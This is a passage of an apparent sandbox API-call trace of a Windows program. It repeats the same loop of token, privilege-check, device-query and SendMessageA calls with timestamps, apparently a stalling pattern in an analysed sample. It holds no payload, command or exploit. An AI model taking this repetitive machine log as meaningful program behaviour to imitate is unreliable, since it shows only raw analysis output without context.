TokenHandle=0x18fe80*=0x0) returned 0 [0084.812] GetLastError () returned 0x3f0 [0084.812] GetCurrentProcess () returned 0xffffffff [0084.812] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.812] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.812] SetLastError (dwErrCode=0x522) [0084.812] CloseHandle (hObject=0x114) returned 1 [0084.812] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.812] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.812] GetLastError () returned 0x578 [0084.812] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.812] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.813] GetCurrentThread () returned 0xfffffffe [0084.813] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.813] GetLastError () returned 0x3f0 [0084.813] GetCurrentProcess () returned 0xffffffff [0084.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.813] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.813] SetLastError (dwErrCode=0x522) [0084.813] CloseHandle (hObject=0x114) returned 1 [0084.813] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.813] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.813] GetLastError () returned 0x578 [0084.813] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.813] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.813] GetCurrentThread () returned 0xfffffffe [0084.813] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.813] GetLastError () returned 0x3f0 [0084.813] GetCurrentProcess () returned 0xffffffff [0084.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.813] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.813] SetLastError (dwErrCode=0x522) [0084.813] CloseHandle (hObject=0x114) returned 1 [0084.813] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.813] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.813] GetLastError () returned 0x578 [0084.813] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.813] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.813] GetCurrentThread () returned 0xfffffffe [0084.813] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.813] GetLastError () returned 0x3f0 [0084.813] GetCurrentProcess () returned 0xffffffff [0084.813] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.813] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.813] SetLastError (dwErrCode=0x522) [0084.813] CloseHandle (hObject=0x114) returned 1 [0084.813] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.813] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.813] GetLastError () returned 0x578 [0084.813] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.813] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.813] GetCurrentThread () returned 0xfffffffe [0084.813] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.814] GetLastError () returned 0x3f0 [0084.814] GetCurrentProcess () returned 0xffffffff [0084.814] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.814] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.022] SetLastError (dwErrCode=0x522) [0085.022] CloseHandle (hObject=0x114) returned 1 [0085.022] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.022] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.022] GetLastError () returned 0x578 [0085.022] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.022] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.022] GetCurrentThread () returned 0xfffffffe [0085.022] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.022] GetLastError () returned 0x3f0 [0085.022] GetCurrentProcess () returned 0xffffffff [0085.022] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.022] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.022] SetLastError (dwErrCode=0x522) [0085.022] CloseHandle (hObject=0x114) returned 1 [0085.022] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.022] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.022] GetLastError () returned 0x578 [0085.022] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.022] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.022] GetCurrentThread () returned 0xfffffffe [0085.022] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.022] GetLastError () returned 0x3f0 [0085.022] GetCurrentProcess () returned 0xffffffff [0085.022] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.022] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.022] SetLastError (dwErrCode=0x522) [0085.022] CloseHandle (hObject=0x114) returned 1 [0085.022] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.022] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.023] GetLastError () returned 0x578 [0085.023] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.023] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.023] GetCurrentThread () returned 0xfffffffe [0085.023] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.023] GetLastError () returned 0x3f0 [0085.023] GetCurrentProcess () returned 0xffffffff [0085.023] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.023] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.023] SetLastError (dwErrCode=0x522) [0085.023] CloseHandle (hObject=0x114) returned 1 [0085.023] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.023] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.023] GetLastError () returned 0x578 [0085.023] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.023] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.023] GetCurrentThread () returned 0xfffffffe [0085.023] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.023] GetLastError () returned 0x3f0 [0085.023] GetCurrentProcess () returned 0xffffffff [0085.023] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.023] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.023] SetLastError (dwErrCode=0x522) [0085.023] CloseHandle (hObject=0x114) returned 1 [0085.023] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.023] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.023] GetLastError () returned 0x578 [0085.023] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.023] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.023] GetCurrentThread () returned 0xfffffffe [0085.023] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.023] GetLastError () returned 0x3f0 [0085.023] GetCurrentProcess () returned 0xffffffff [0085.023] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.023] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.023] SetLastError (dwErrCode=0x522) [0085.023] CloseHandle (hObject=0x114) returned 1 [0085.023] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.023] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.023] GetLastError () returned 0x578 [0085.023] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.023] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.023] GetCurrentThread () returned 0xfffffffe [0085.023] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.023] GetLastError () returned 0x3f0 [0085.023] GetCurrentProcess () returned 0xffffffff [0085.023] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.024] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.024] SetLastError (dwErrCode=0x522) [0085.024] CloseHandle (hObject=0x114) returned 1 [0085.024] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.024] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.024] GetLastError () returned 0x578 [0085.024] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.024] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.024] GetCurrentThread () returned 0xfffffffe [0085.024] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.024] GetLastError () returned 0x3f0 [0085.024] GetCurrentProcess () returned 0xffffffff [0085.024] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.024] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.024] SetLastError (dwErrCode=0x522) [0085.024] CloseHandle (hObject=0x114) returned 1 [0085.024] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.024] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.024] GetLastError () returned 0x578 [0085.024] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.024] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.024] GetCurrentThread () returned 0xfffffffe [0085.024] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.024] GetLastError () returned 0x3f0 [0085.024] GetCurrentProcess () returned 0xffffffff [0085.024] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.024] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.024] SetLastError (dwErrCode=0x522) [0085.024] CloseHandle (hObject=0x114) returned 1 [0085.024] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.024] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.024] GetLastError () returned 0x578 [0085.024] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.024] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.024] GetCurrentThread () returned 0xfffffffe [0085.024] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.024] GetLastError () returned 0x3f0 [0085.024] GetCurrentProcess () returned 0xffffffff [0085.024] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.024] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.024] SetLastError (dwErrCode=0x522) [0085.024] CloseHandle (hObject=0x114) returned 1 [0085.024] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.024] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.024] GetLastError () returned 0x578 [0085.024] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.024] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.024] GetCurrentThread () returned 0xfffffffe [0085.024] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.025] GetLastError () returned 0x3f0 [0085.025] GetCurrentProcess () returned 0xffffffff [0085.025] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.025] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.025] SetLastError (dwErrCode=0x522) [0085.025] CloseHandle (hObject=0x114) returned 1 [0085.025] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.025] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.025] GetLastError () returned 0x578 [0085.025] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.025] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.025] GetCurrentThread () returned 0xfffffffe [0085.025] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.025] GetLastError () returned 0x3f0 [0085.025] GetCurrentProcess () returned 0xffffffff [0085.025] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.025] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.025] SetLastError (dwErrCode=0x522) [0085.025] CloseHandle (hObject=0x114) returned 1 [0085.025] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.025] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.025] GetLastError () returned 0x578 [0085.025] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.025] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.025] GetCurrentThread () returned 0xfffffffe [0085.025] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.025] GetLastError () returned 0x3f0 [0085.025] GetCurrentProcess () returned 0xffffffff [0085.025] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.025] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.025] SetLastError (dwErrCode=0x522) [0085.025] CloseHandle (hObject=0x114) returned 1 [0085.025] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.025] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.025] GetLastError () returned 0x578 [0085.025] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.025] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.025] GetCurrentThread () returned 0xfffffffe [0085.025] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.025] GetLastError () returned 0x3f0 [0085.025] GetCurrentProcess () returned 0xffffffff [0085.025] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.025] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.025] SetLastError (dwErrCode=0x522) [0085.025] CloseHandle (hObject=0x114) returned 1 [0085.025] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.025] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.025] GetLastError () returned 0x578 [0085.026] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.026] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.026] GetCurrentThread () returned 0xfffffffe [0085.026] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.026] GetLastError () returned 0x3f0 [0085.026] GetCurrentProcess () returned 0xffffffff [0085.026] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.026] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.026] SetLastError (dwErrCode=0x522) [0085.026] CloseHandle (hObject=0x114) returned 1 [0085.026] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.026] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.026] GetLastError () returned 0x578 [0085.026] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.026] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.026] GetCurrentThread () returned 0xfffffffe [0085.026] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.026] GetLastError () returned 0x3f0 [0085.026] GetCurrentProcess () returned 0xffffffff [0085.026] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.026] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.026] SetLastError (dwErrCode=0x522) [0085.026] CloseHandle (hObject=0x114) returned 1 [0085.026] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.026] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.026] GetLastError () returned 0x578 [0085.026] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.026] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.026] GetCurrentThread () returned 0xfffffffe [0085.026] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.026] GetLastError () returned 0x3f0 [0085.026] GetCurrentProcess () returned 0xffffffff [0085.026] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.026] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.026] SetLastError (dwErrCode=0x522) [0085.026] CloseHandle (hObject=0x114) returned 1 [0085.026] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.026] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.026] GetLastError () returned 0x578 [0085.026] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.026] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.026] GetCurrentThread () returned 0xfffffffe [0085.026] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.026] GetLastError () returned 0x3f0 [0085.026] GetCurrentProcess () returned 0xffffffff [0085.026] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.026] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.027] SetLastError (dwErrCode=0x522) [0085.027] CloseHandle (hObject=0x114) returned 1 [0085.027] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.027] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.027] GetLastError () returned 0x578 [0085.027] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.027] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.027] GetCurrentThread () returned 0xfffffffe [0085.027] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, 